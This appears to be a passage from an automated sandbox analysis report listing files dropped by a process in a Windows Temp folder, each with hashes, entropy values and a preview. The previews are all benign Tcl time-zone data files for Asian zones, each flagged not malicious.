                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Ho_Chi_Minh)]} {. LoadTimeZoneFile Asia/Ho_Chi_Minh.}.set TZData(:Asia/Saigon) $TZData(:Asia/Ho_Chi_Minh).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2154
                                                                                                                                                                                                                                                    Entropy (8bit):3.9200886100513186
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:5i1mvzfkLCHT2voaWlOvUhxJWHflhQXAY3:gyHT2vRvwAHdSQY3
                                                                                                                                                                                                                                                    MD5:72B74A9380524E321FBECDDC57206D09
                                                                                                                                                                                                                                                    SHA1:80C6D4FF833A1FA58FD3D5EA08558FA557DB0D87
                                                                                                                                                                                                                                                    SHA-256:8B6875BC4A4D7BC318229D522C2A9CA41F64993A05AADC1E0CC3111430F25934
                                                                                                                                                                                                                                                    SHA-512:BD961D582D3C92B2C99BE6D232B57EDC2594A7CEED317F71A706BC6FBF835DD476FB0343C58013665738AC4527A4C7E1DEFF2A47CF082059041F2456F69FD148
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Sakhalin) {. {-9223372036854775808 34248 0 LMT}. {-2031039048 32400 0 JCST}. {-1017824400 32400 0 JST}. {-768560400 39600 0 SAKMMTT}. {354891600 43200 1 SAKST}. {370699200 39600 0 SAKT}. {386427600 43200 1 SAKST}. {402235200 39600 0 SAKT}. {417963600 43200 1 SAKST}. {433771200 39600 0 SAKT}. {449586000 43200 1 SAKST}. {465318000 39600 0 SAKT}. {481042800 43200 1 SAKST}. {496767600 39600 0 SAKT}. {512492400 43200 1 SAKST}. {528217200 39600 0 SAKT}. {543942000 43200 1 SAKST}. {559666800 39600 0 SAKT}. {575391600 43200 1 SAKST}. {591116400 39600 0 SAKT}. {606841200 43200 1 SAKST}. {622566000 39600 0 SAKT}. {638290800 43200 1 SAKST}. {654620400 39600 0 SAKT}. {670345200 36000 0 SAKMMTT}. {670348800 39600 1 SAKST}. {686073600 36000 0 SAKT}. {695750400 39600 0 SAKMMTT}. {701784000 43200 1 SAKST}. {717505200 39600 0 SAKT}. {733244400 43200
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):912
                                                                                                                                                                                                                                                    Entropy (8bit):4.0996909489016335
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:MBp52tlmdH897SogKk4khWuf7Z/UOfmWnmjDIdhWdMr2jmjdODPRWZsdXT4Wuwyc:cQtleA7ETh7tmdPIiOdzeJTUPc
                                                                                                                                                                                                                                                    MD5:86864CDFD578B3CD01DFCBCF3263BB3B
                                                                                                                                                                                                                                                    SHA1:8A009E64EDDBAC2F675ABACBAB742AAF414A7E7E
                                                                                                                                                                                                                                                    SHA-256:AF87E9597C2AA014C996F88AA95A87D71594436D13D3F4246B8B1AA3AA0E8E66
                                                                                                                                                                                                                                                    SHA-512:537EB0B970E42A3EB31CF3779E637698761FE598FE64BFE76827C1157E9E1421BA316299FA27F5F0ADB26645DA2587D4E7B5781CDDE5695CED5146AB3AAB74D5
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Samarkand) {. {-9223372036854775808 16073 0 LMT}. {-1441168073 14400 0 SAMT}. {-1247544000 18000 0 SAMT}. {354913200 21600 1 SAMST}. {370720800 21600 0 TAST}. {386445600 18000 0 SAMT}. {386449200 21600 1 SAMST}. {402256800 18000 0 SAMT}. {417985200 21600 1 SAMST}. {433792800 18000 0 SAMT}. {449607600 21600 1 SAMST}. {465339600 18000 0 SAMT}. {481064400 21600 1 SAMST}. {496789200 18000 0 SAMT}. {512514000 21600 1 SAMST}. {528238800 18000 0 SAMT}. {543963600 21600 1 SAMST}. {559688400 18000 0 SAMT}. {575413200 21600 1 SAMST}. {591138000 18000 0 SAMT}. {606862800 21600 1 SAMST}. {622587600 18000 0 SAMT}. {638312400 21600 1 SAMST}. {654642000 18000 0 SAMT}. {670366800 21600 1 SAMST}. {683665200 21600 0 UZST}. {686091600 18000 0 UZT}. {694206000 18000 0 UZT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):750
                                                                                                                                                                                                                                                    Entropy (8bit):4.127244109010669
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:MBp525mdHjauv/+zWz4aqceOcrIt04CaI8/HUYVfXzQD:cQ5edvCWzJnJGIt047I8/Hp/zQD
                                                                                                                                                                                                                                                    MD5:0DE471C9ED2CE585A03A15460D146459
                                                                                                                                                                                                                                                    SHA1:02C75252A112CFDCC6DDCFA30C0E68AA07ACE46D
                                                                                                                                                                                                                                                    SHA-256:290862830F3B606F6A4FBD50D07FE5204FC105BF97672DC84B58650C57B45117
                                                                                                                                                                                                                                                    SHA-512:A10C50863B9C292A6E4181A477FE01B9ED6E9A103ECE45DEEEDDDEEA4ABBC59F6DE21319232EEAB677A3A1396BA9382D92F2D184B262C132EEB81D6DEC49D205
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Seoul) {. {-9223372036854775808 30472 0 LMT}. {-1948782472 30600 0 KST}. {-1830414600 32400 0 JCST}. {-1017824400 32400 0 JST}. {-767350800 32400 0 KST}. {-498128400 30600 0 KST}. {-462702600 34200 1 KDT}. {-451733400 30600 0 KST}. {-429784200 34200 1 KDT}. {-418296600 30600 0 KST}. {-399544200 34200 1 KDT}. {-387451800 30600 0 KST}. {-368094600 34200 1 KDT}. {-356002200 30600 0 KST}. {-336645000 34200 1 KDT}. {-324552600 30600 0 KST}. {-305195400 34200 1 KDT}. {-293103000 30600 0 KST}. {-264933000 32400 0 KST}. {547578000 36000 1 KDT}. {560883600 32400 0 KST}. {579027600 36000 1 KDT}. {592333200 32400 0 KST}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):626
                                                                                                                                                                                                                                                    Entropy (8bit):4.194042778471814
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:MBp52vEmdHePvZMW5zq/XVucq/GrNkq/HxJ2Qzq/hSaq/5Mq/xssjq/Xwq/4N:cQ8emvZM+q/Xbq/Ckq/Hx4Qzq/hLq/Cc
                                                                                                                                                                                                                                                    MD5:4A1A94E2FA26768980684CF1889D5A0E
                                                                                                                                                                                                                                                    SHA1:D256BCB1A705B70C948EC4E3AC9802B488181CCC
                                                                                                                                                                                                                                                    SHA-256:EA212F8C97687138142FD1AA96E32EBF038689003A61525FEAD7653144152370
                                                                                                                                                                                                                                                    SHA-512:5B949DF00702D2B5B214AB4FF8BEB827D6BF92C5F5C407D746FB4C717C707206EE3126986C16317687414D4771CEC3AF891EC24697077D328AEED1AD3D0E7758
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Shanghai) {. {-9223372036854775808 29143 0 LMT}. {-2177481943 28800 0 CST}. {-933494400 32400 1 CDT}. {-923130000 28800 0 CST}. {-908784000 32400 1 CDT}. {-891594000 28800 0 CST}. {-662716800 28800 0 CST}. {515520000 32400 1 CDT}. {527007600 28800 0 CST}. {545155200 32400 1 CDT}. {558457200 28800 0 CST}. {576604800 32400 1 CDT}. {589906800 28800 0 CST}. {608659200 32400 1 CDT}. {621961200 28800 0 CST}. {640108800 32400 1 CDT}. {653410800 28800 0 CST}. {671558400 32400 1 CDT}. {684860400 28800 0 CST}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):386
                                                                                                                                                                                                                                                    Entropy (8bit):4.499763562586137
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9X52wKfbdJm2OHxdPmIWOb/qgOMesF3His0dqgs8kvmQCIqgMQiI/0SGibL:MBp52nbdJmdHDPxDTNF+8tuQ90SrL
                                                                                                                                                                                                                                                    MD5:72F394A6DB71E5E22742EFE4B2A3FE30
                                                                                                                                                                                                                                                    SHA1:2BEAAE84CA2F2725C1A37139C312E56285339561
                                                                                                                                                                                                                                                    SHA-256:B26FC478C496F512E21A6B81CDBFDB437E60F042AE49FFB701647DA2432B5DAA
                                                                                                                                                                                                                                                    SHA-512:27D62AC711656D3D1E6BDDB428C764ECCFF7C6CF5D284096A931EDFE9EF5590D6832F669B0FEB9582FF413E77A0B6385227781A4C2BFC089986A29168FD313FD
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Singapore) {. {-9223372036854775808 24925 0 LMT}. {-2177477725 24925 0 SMT}. {-2038200925 25200 0 MALT}. {-1167634800 26400 1 MALST}. {-1073028000 26400 0 MALT}. {-894180000 27000 0 MALT}. {-879665400 32400 0 JST}. {-767005200 27000 0 MALT}. {-138785400 27000 0 SGT}. {378664200 28800 0 SGT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2098
                                                                                                                                                                                                                                                    Entropy (8bit):3.989946517460551
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:cQHOedI8vhOCTi7ZXltAtwGpd296ymXPO9UHxQdCHt/CXHmW9YbcINu4:5HVvhBiR8ld296yKPO9UHj1UGWgc4u4
                                                                                                                                                                                                                                                    MD5:9F280881FA89EA08AED21770A8F02EF2
                                                                                                                                                                                                                                                    SHA1:AFAB497095566E420408FF772D635D11F1BB7A6D
                                                                                                                                                                                                                                                    SHA-256:8F774190DFCEA547C394E452388002DC3130918F4BE82D607A5ED2E05EFAE4CD
                                                                                                                                                                                                                                                    SHA-512:CA96A79FA8532A0487A1A1A161E539A3D06A77BE6D5B28396EB4AAC3C60A9212B4919B5EB5B6EA156A06437C742CD2E1BC675176B6B7FCEABABD9299C823A69C
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Srednekolymsk) {. {-9223372036854775808 36892 0 LMT}. {-1441188892 36000 0 MAGT}. {-1247565600 39600 0 MAGMMTT}. {354891600 43200 1 MAGST}. {370699200 39600 0 MAGT}. {386427600 43200 1 MAGST}. {402235200 39600 0 MAGT}. {417963600 43200 1 MAGST}. {433771200 39600 0 MAGT}. {449586000 43200 1 MAGST}. {465318000 39600 0 MAGT}. {481042800 43200 1 MAGST}. {496767600 39600 0 MAGT}. {512492400 43200 1 MAGST}. {528217200 39600 0 MAGT}. {543942000 43200 1 MAGST}. {559666800 39600 0 MAGT}. {575391600 43200 1 MAGST}. {591116400 39600 0 MAGT}. {606841200 43200 1 MAGST}. {622566000 39600 0 MAGT}. {638290800 43200 1 MAGST}. {654620400 39600 0 MAGT}. {670345200 36000 0 MAGMMTT}. {670348800 39600 1 MAGST}. {686073600 36000 0 MAGT}. {695750400 39600 0 MAGMMTT}. {701784000 43200 1 MAGST}. {717505200 39600 0 MAGT}. {733244400 43200 1 MAGST}. {748969200
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1299
                                                                                                                                                                                                                                                    Entropy (8bit):3.9929422802732284
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:cQXbe9ZKzuzq/9mBq/Qq/LPq/wO3q/uq/PC9q/hq/Rq/Gq/fq/Aq/Vtyq/fQH+zp:5XwMKG/M4/z/W/Ta/1/V/Y/o/d/y/D/t
                                                                                                                                                                                                                                                    MD5:1CC71F0D50FB0A316B0501512B5ACDC7
                                                                                                                                                                                                                                                    SHA1:276DE73F04C609815C20DEDAD54211F2DC4030FA
                                                                                                                                                                                                                                                    SHA-256:8EB584365A8CEF00BCDBBBB9CAAF34822C193DBC0DB43D1F142C72B64FA51F0C
                                                                                                                                                                                                                                                    SHA-512:0DC9E1E73B4F31C059DD254DB5B84E0C93366A701AF033664F7EFD9192EE2CFF80C2AA6C80C950262295B179283D58AD6CC2D833CA05E2053C97D8CF448757B3
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Taipei) {. {-9223372036854775808 29160 0 LMT}. {-2335248360 28800 0 JWST}. {-1017820800 32400 0 JST}. {-766224000 28800 0 CST}. {-745833600 32400 1 CDT}. {-733827600 28800 0 CST}. {-716889600 32400 1 CDT}. {-699613200 28800 0 CST}. {-683884800 32400 1 CDT}. {-670669200 28800 0 CST}. {-652348800 32400 1 CDT}. {-639133200 28800 0 CST}. {-620812800 32400 1 CDT}. {-607597200 28800 0 CST}. {-589276800 32400 1 CDT}. {-576061200 28800 0 CST}. {-562924800 32400 1 CDT}. {-541760400 28800 0 CST}. {-528710400 32400 1 CDT}. {-510224400 28800 0 CST}. {-497174400 32400 1 CDT}. {-478688400 28800 0 CST}. {-465638400 32400 1 CDT}. {-449830800 28800 0 CST}. {-434016000 32400 1 CDT}. {-418208400 28800 0 CST}. {-402480000 32400 1 CDT}. {-386672400 28800 0 CST}. {-370944000 32400 1 CDT}. {-355136400 28800 0 CST}. {-339408000 32400 1 CDT}. {-323600400
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):911
                                                                                                                                                                                                                                                    Entropy (8bit):4.052777429242368
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:cQZeQlNlDfHFCZaqAHDggMBj945uZYQT2TXTxPc:5HtPqxNpybVPc
                                                                                                                                                                                                                                                    MD5:95BED1C2734ED186682711BCF8EEC906
                                                                                                                                                                                                                                                    SHA1:C214A57C49C7B1A52F4115D7E0546222E9834CC9
                                                                                                                                                                                                                                                    SHA-256:B4AE1956008514F28918E41C6DE49EB2E36A636E0BC76F72AF58B96920718825
                                                                                                                                                                                                                                                    SHA-512:2A83B75BA490BD88102A8E6B198CE29CE7FB9881648E8F0EC0228FA562A8C954A10850DC2B7AFA4108AB19284690614B0241410C400C3AC6595C222AF7A36117
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Tashkent) {. {-9223372036854775808 16631 0 LMT}. {-1441168631 18000 0 TAST}. {-1247547600 21600 0 TAST}. {354909600 25200 1 TASST}. {370717200 21600 0 TAST}. {386445600 25200 1 TASST}. {402253200 21600 0 TAST}. {417981600 25200 1 TASST}. {433789200 21600 0 TAST}. {449604000 25200 1 TASST}. {465336000 21600 0 TAST}. {481060800 25200 1 TASST}. {496785600 21600 0 TAST}. {512510400 25200 1 TASST}. {528235200 21600 0 TAST}. {543960000 25200 1 TASST}. {559684800 21600 0 TAST}. {575409600 25200 1 TASST}. {591134400 21600 0 TAST}. {606859200 25200 1 TASST}. {622584000 21600 0 TAST}. {638308800 25200 1 TASST}. {654638400 21600 0 TAST}. {670363200 18000 0 TAST}. {670366800 21600 1 TASST}. {683665200 21600 0 UZST}. {686091600 18000 0 UZT}. {694206000 18000 0 UZT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1719
                                                                                                                                                                                                                                                    Entropy (8bit):3.8990179334130297
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:cQyGeHLxaCkbPcXsXZUzJJu8ZmFebPR4c9alNkA/tbd8ttF6E39Uf1IUMc9UFvUU:5+2Tt5imFTN9VsZ7QZsKen
                                                                                                                                                                                                                                                    MD5:78BCAE5025D10EF394F53CDFED0A3C7D
                                                                                                                                                                                                                                                    SHA1:C99AE196C2FAD28F1B23D7F3B911BB5DE5A1C329
                                                                                                                                                                                                                                                    SHA-256:D053A89FD9FA79A6B6427A3306753BF14DB4E0B1FCE333BC1F15B9474D5CA9CE
                                                                                                                                                                                                                                                    SHA-512:9D2DD7E006C1E6D651E2EAACF5E498A53E2A72BEBD9A299A1925FD155A8C2DB1A95804B27E0988ABC77E6869DA405649CB3D7D3EEBC44E25C2C23D7C07E11D85
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Tbilisi) {. {-9223372036854775808 10751 0 LMT}. {-2840151551 10751 0 TBMT}. {-1441162751 10800 0 TBIT}. {-405140400 14400 0 TBIT}. {354916800 18000 1 TBIST}. {370724400 14400 0 TBIT}. {386452800 18000 1 TBIST}. {402260400 14400 0 TBIT}. {417988800 18000 1 TBIST}. {433796400 14400 0 TBIT}. {449611200 18000 1 TBIST}. {465343200 14400 0 TBIT}. {481068000 18000 1 TBIST}. {496792800 14400 0 TBIT}. {512517600 18000 1 TBIST}. {528242400 14400 0 TBIT}. {543967200 18000 1 TBIST}. {559692000 14400 0 TBIT}. {575416800 18000 1 TBIST}. {591141600 14400 0 TBIT}. {606866400 18000 1 TBIST}. {622591200 14400 0 TBIT}. {638316000 18000 1 TBIST}. {654645600 14400 0 TBIT}. {670370400 14400 1 TBIST}. {671140800 14400 0 GEST}. {686098800 10800 0 GET}. {694213200 10800 0 GET}. {701816400 14400 1 GEST}. {717537600 10800 0 GET}. {733266000 14400 1 GEST}. {
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):3084
                                                                                                                                                                                                                                                    Entropy (8bit):3.8446147411925486
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:+oDm0LvKjM7z5/PwPHoHsWLYR7BsE8dySscPWQNgqRf9RP2x8O2J024ptlxP/XF5:+oC0LvKjcz5/POHCsWL87BsE8dyjcPWf
                                                                                                                                                                                                                                                    MD5:DAA3AB1A5C0FAF5DED242E1DC4E5E5B7
                                                                                                                                                                                                                                                    SHA1:07EAC7A67E0B7B2B6F69063BB8F82C2392A6E306
                                                                                                                                                                                                                                                    SHA-256:5E138AAE70A3E9E8FBB3B6CC5425984D90D4A1C630CF9A889771E02DC6DFB265
                                                                                                                                                                                                                                                    SHA-512:8902EE1F8A2C9A71B255B61C14D4BDE06E230B8E489560725F4DDE9739F0581FFA0057783944C511A16FC92F905F32242530E983AFD232A6052073ADD40B8753
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Tehran) {. {-9223372036854775808 12344 0 LMT}. {-1704165944 12344 0 TMT}. {-757394744 12600 0 IRST}. {247177800 14400 0 IRST}. {259272000 18000 1 IRDT}. {277758000 14400 0 IRST}. {283982400 12600 0 IRST}. {290809800 16200 1 IRDT}. {306531000 12600 0 IRST}. {322432200 16200 1 IRDT}. {338499000 12600 0 IRST}. {673216200 16200 1 IRDT}. {685481400 12600 0 IRST}. {701209800 16200 1 IRDT}. {717103800 12600 0 IRST}. {732745800 16200 1 IRDT}. {748639800 12600 0 IRST}. {764281800 16200 1 IRDT}. {780175800 12600 0 IRST}. {795817800 16200 1 IRDT}. {811711800 12600 0 IRST}. {827353800 16200 1 IRDT}. {843247800 12600 0 IRST}. {858976200 16200 1 IRDT}. {874870200 12600 0 IRST}. {890512200 16200 1 IRDT}. {906406200 12600 0 IRST}. {922048200 16200 1 IRDT}. {937942200 12600 0 IRST}. {953584200 16200 1 IRDT}. {969478200 12600 0 IRST}. {985206600 16
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):179
                                                                                                                                                                                                                                                    Entropy (8bit):4.82789113675599
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq85zFFwVAIgN0AzFzt2WFK+TT52WFKYzFp:SlSWB9IZaM3yZbwVAIgCAb2wKsswKY7
                                                                                                                                                                                                                                                    MD5:D044282CC9B9F531D8136612B4AA938D
                                                                                                                                                                                                                                                    SHA1:5FD01E48BFFC2B54BBA48926EFD2137A91B57E0F
                                                                                                                                                                                                                                                    SHA-256:FE57D86184A7F4A64F3555DE3F4463531A86BB18F124534F17B09FAB825F83B4
                                                                                                                                                                                                                                                    SHA-512:DBBA54D68F33E51D51E816D79D83B61490BD31262DFF6037C0834BADA48CBC02F4281203D7212EDF6D96F7FF1EF3843299698BF0DFE10B5F1383AA504594505A
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Jerusalem)]} {. LoadTimeZoneFile Asia/Jerusalem.}.set TZData(:Asia/Tel_Aviv) $TZData(:Asia/Jerusalem).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):171
                                                                                                                                                                                                                                                    Entropy (8bit):4.858169634371472
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq8kNZ4pVAIgNqFNzO62WFK9Z752WFKvNZvn:SlSWB9IZaM3ykZ4pVAIgc3K62wKf12wc
                                                                                                                                                                                                                                                    MD5:B678D97B4E6E6112299746833C06C70B
                                                                                                                                                                                                                                                    SHA1:A49BD45DB59BDD3B7BF9159699272389E8EF77AC
                                                                                                                                                                                                                                                    SHA-256:6AEAE87CAD7FE358A5A1BABE6C0244A3F89403FC64C5AA19E1FFDEDCEB6CF57B
                                                                                                                                                                                                                                                    SHA-512:BEA10EAE5941E027D8FE9E5D5C03FAE5DCFEF7603088E71CA7CCD0461851E175AE1CC7592DFBEC63F91D840E4E0AA04B54549EB71303666E6EA16AFFF6EDA058
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Thimphu)]} {. LoadTimeZoneFile Asia/Thimphu.}.set TZData(:Asia/Thimbu) $TZData(:Asia/Thimphu).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):171
                                                                                                                                                                                                                                                    Entropy (8bit):4.8942281798484615
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFx52WFKvNZLXGm2OHEQUTFnvSVaJKuc/vhGFDV9gmZVFvbv:SlSWB9X52wKVZCm2OHEfnjKuc/JG1V9l
                                                                                                                                                                                                                                                    MD5:F11F6E49B655045210CBC9B97BE8BD32
                                                                                                                                                                                                                                                    SHA1:B4ED9F32D9D18FC247E80AF2D19D2B7AFF58E23F
                                                                                                                                                                                                                                                    SHA-256:FFD5F8C9FF0FE1FF191C35A1910EE39FFD0BC0DCBE045D4651745E9AB175EBD5
                                                                                                                                                                                                                                                    SHA-512:4095C531BF55F7424E01A2A6259F5CECD063CE4DBC5C4830E1AD663BA57B6E7852FDAFD560C599F3E6DB650B0A7E8E3DB8D7985E6CE59DDB30C9B267E21AF2B5
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Thimphu) {. {-9223372036854775808 21516 0 LMT}. {-706341516 19800 0 IST}. {560025000 21600 0 BTT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):435
                                                                                                                                                                                                                                                    Entropy (8bit):4.351989228563058
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:MBp52XmdHOx5PAfvz/+zbL7Kzb674ybFj7azoheja:cQXeOPAfbCvGzu0y5G+eja
                                                                                                                                                                                                                                                    MD5:C89868DEC326A339E33522C333AECEFC
                                                                                                                                                                                                                                                    SHA1:7293EDE35C309353905BBC42583A0F660C72D7A9
                                                                                                                                                                                                                                                    SHA-256:D53CA0525A7DE088836EA844BA8B1CFD1FC1D92B7A36BF4DEFD6270872D47196
                                                                                                                                                                                                                                                    SHA-512:DAC49E39E568B3A798CAC4A0975912954D19EB9B3B4EAF0CA9811BEB5A773896E2D710723EC69A5A06170E6E0D175DD62F03F8D0494EFBE0F7376D729E8D7C21
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Tokyo) {. {-9223372036854775808 33539 0 LMT}. {-2587712400 32400 0 JST}. {-2335251600 32400 0 JCST}. {-1017824400 32400 0 JST}. {-683794800 36000 1 JDT}. {-672393600 32400 0 JST}. {-654764400 36000 1 JDT}. {-640944000 32400 0 JST}. {-620290800 36000 1 JDT}. {-609494400 32400 0 JST}. {-588841200 36000 1 JDT}. {-578044800 32400 0 JST}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):181
                                                                                                                                                                                                                                                    Entropy (8bit):4.8489855608543575
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq8pYFwVAIgNzB0L2WFKPQOrFJ4WFKvn:SlSWB9IZaM3yWFwVAIg8L2wKPQOrFJ4H
                                                                                                                                                                                                                                                    MD5:AF91CF42CFBA12F55AF3E6D26A71946D
                                                                                                                                                                                                                                                    SHA1:673AC77D4E5B6ED7CE8AE67975372462F6AF870B
                                                                                                                                                                                                                                                    SHA-256:D9BCAE393D4B9EE5F308FA0C26A7A6BCE716E77DB056E75A3B39B33A227760C8
                                                                                                                                                                                                                                                    SHA-512:1FD61EA39FF08428486E07AF4404CEA67ACCCB600F11BA74B340A4F663EB8221BC7BF84AE677566F7DDEC0CB42F1946614CD11A9CD7824E0D6CAA804DF0EF514
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Makassar)]} {. LoadTimeZoneFile Asia/Makassar.}.set TZData(:Asia/Ujung_Pandang) $TZData(:Asia/Makassar).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
